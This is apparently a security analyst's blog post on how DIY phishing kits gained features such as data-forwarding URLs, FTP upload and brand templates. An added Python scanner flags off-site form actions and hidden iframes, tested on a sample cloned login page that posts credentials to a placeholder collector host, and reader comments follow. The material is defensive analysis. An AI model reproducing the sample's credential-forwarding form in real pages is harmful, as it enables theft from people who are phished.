DIY phishing kits introducing new features


What are some of the main factors behind the increase in phishing attacks, and behind their maturation from passive emails into blended threats that attempt not just to steal personal information, but also to infect the visitor with malware by embedding exploits for client-side vulnerabilities in the pages? It's all a matter of perspective, and this post focuses on phishers' continuing efforts to innovate and introduce new features in the most recently obtained do-it-yourself phishing page generators.

With the overall availability of phishing pages, which phishers constantly update to keep up with the brands' changing login pages, phishing pages for every brand and financial institution can easily be seen as a commodity good in the underground market. This trend is directly lowering the entry barriers into the phishing market segment, allowing novice phishers to use the very same scam pages that professional phishers once used.

The DIY phishing kit trend started emerging around August 2007 with the distribution of a simple kit (screenshots included) whose objective was to make it easy for a phisher who already possessed a phishing page to enter the URL to which all the captured data would be forwarded. Several months later the kit went 2.0 (screenshots included) and introduced new preview and image-grabber features, making it easier for the phisher to obtain the images to be used in the attack.

In early 2008 two more phishing kits appeared in the wild, the first one having direct FTP upload capabilities as well as automated updating of the latest phishing page, and the second one taking advantage of plugins under a .phish file extension. Both kits ship with a great many phishing pages in the default installation, targeting brands like the following for starters:

AIM, Amazon, AOL, Bebo, Chas Bank, City Bank, Click and Buy, Ebay, Facebook, File Front, Freewebs, Friendster, Game Battles, Gmail, Hotmail, ICQ, iTunes, Money Bookers, Myspace, Nexon, Paypal, Photobucket, Rapidshare, Ripway, Runescape, Skype, Xbox, Yahoo Mail, Youtube

How do the Rock Phish kit, and the botnets used as the primary distribution vectors, fit into the picture? Just fine, given that custom-tailored templates with the latest version of the login page are the foundation of any phishing campaign. That also leads us to another perspective: is someone getting successfully phished with the latest version of the original login page, or are they getting phished with an outdated one?

Key summary points:

  • this ongoing competition among the kits' creators would ultimately serve the average phisher, empowering her with access to both the pages and the ability to tweak them, and make it easy
  • the introduction of point-and-click upload functions is a great indication of features to come; in fact, knowing that the Russian Business Network's infrastructure was participating in a phisher-in-the-middle attack prompts me to ask "what if" known malicious and scammy infrastructure starts offering direct hosting access like the one introduced in the first kit
  • now that templates can be configured more easily, monitoring of changes made to the original login pages, and integrating upload
  • taking into consideration related security incidents where stolen FTP credentials were used to embed malicious iFrames on the affected servers, automating the upload process to take advantage of huge lists of already compromised account data is likely to appear as a feature in the short term

Whereas for the time being phishing remains a passive attack on a large scale, the potential to evolve by default into a blended threat, including exploits that would serve malware from the phishing page itself, has always been there. Lone phishers whose mentality has nothing to do with efficiency have been embracing the DIY trend for the past two years, while the efficiency-minded continue using botnets to generate and send as many phishing pages as possible. However, the "benefits" of embedding exploits and malware on a phishing page in order to optimize the effect of the campaign even if the end user doesn't fall victim to the scam can also trigger an alarm because of the embedded exploits, one that would not have been triggered had the phishing page been clean of them.

To sum up: phishing tactics are evolving. Phishing pages are already being hosted on defaced web servers, legitimate sites are SQL injected so that the survivability of the page is passed on to the injected server, and worst of all, this is done efficiently and will continue to be done even more efficiently.
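As an added example that is not part of the original post, the following Python scanner flags the two page traits described above from a defender's side: a login form that forwards the submitted data to a host other than the page's own (the kit's "enter a URL" feature), and the hidden or 1x1 iframes that turn a phishing page into a blended threat. The sample HTML and the .example.invalid hostnames are constructed for the example.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a cloned login page whose form posts off-site and
# which also carries a 1x1 hidden iframe (placeholder hostnames).
SAMPLE_HTML = """
<html><body>
<form method="post" action="http://collector.example.invalid/drop.php">
  <input name="user"><input name="pass" type="password">
</form>
<iframe src="http://thirdparty.example.invalid/x.html"
        width="1" height="1" style="visibility:hidden"></iframe>
</body></html>
"""


class PhishTraitScanner(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlparse(page_url).hostname
        self.findings = []  # list of (trait, value) tuples

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # Resolve relative actions against the page URL, then compare hosts.
            target = urljoin(self.page_url, a.get("action") or "")
            host = urlparse(target).hostname
            if host and host != self.page_host:
                self.findings.append(("offsite_form_action", target))
        elif tag == "iframe":
            # Zero/one-pixel or CSS-hidden frames are the classic exploit carrier.
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = "display:none" in style or "visibility:hidden" in style
            if tiny or hidden:
                self.findings.append(("hidden_iframe", a.get("src") or ""))


def scan_page(html, page_url):
    """Return the (trait, value) findings for one page fetched from page_url."""
    scanner = PhishTraitScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return scanner.findings
```

Running `scan_page(SAMPLE_HTML, "http://login.example.invalid/")` reports both the off-site form action and the hidden iframe, while a page whose form posts back to its own host and whose frames are visible produces no findings.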


Dancho Danchev

About Dancho Danchev

Dancho Danchev is an independent security consultant and cyber threats analyst, with extensive experience in open source intelligence gathering, malware and cybercrime incident response.


Talkback

5 comments
  • Arrest them, Jail them.

    Make the possession of such software, with the exception of the scientific community, illegal and punishable by 5 years minimum in jail.

    Or send them to Gitmo. That would be my choice...
    BitTwiddler
    • Turn em loose

      in a room filled with people who have had their identities stolen, no cameras. Then they can see just how their crimes really do have a human face.

      TripleII

      No, it isn't too harsh, all of them are a waste of perfectly good skin.
      TripleII
    • Possession of what type of software?

      The problem with legislating against possession of software is that we have enough trouble already interpreting things like patent law when it relates to software. While there are obvious cases of software solely used to build malware, do you really want a court of law trying to determine where the line be drawn between a malware generator and development software? Any text editor could be considered a malware generator if you had the right person at the keyboard.
      gardoglee
      • Yes, criminalizing only hurts honest people

        Basically, it criminalizes research like this article. The criminals on the other hand won't care...

        But it won't be a first, some security research is already probably illegal in the US. That's probably why the best anti-virus packages come from non-US countries, such as Australia and Russia.
        XP user
        • RE: Yes, criminalizing only hurts honest people

          I don't understand what you mean... Why would it be illegal in The US? But I agree with you, I have seen far better AV programs from overseas.
          greatnewproducts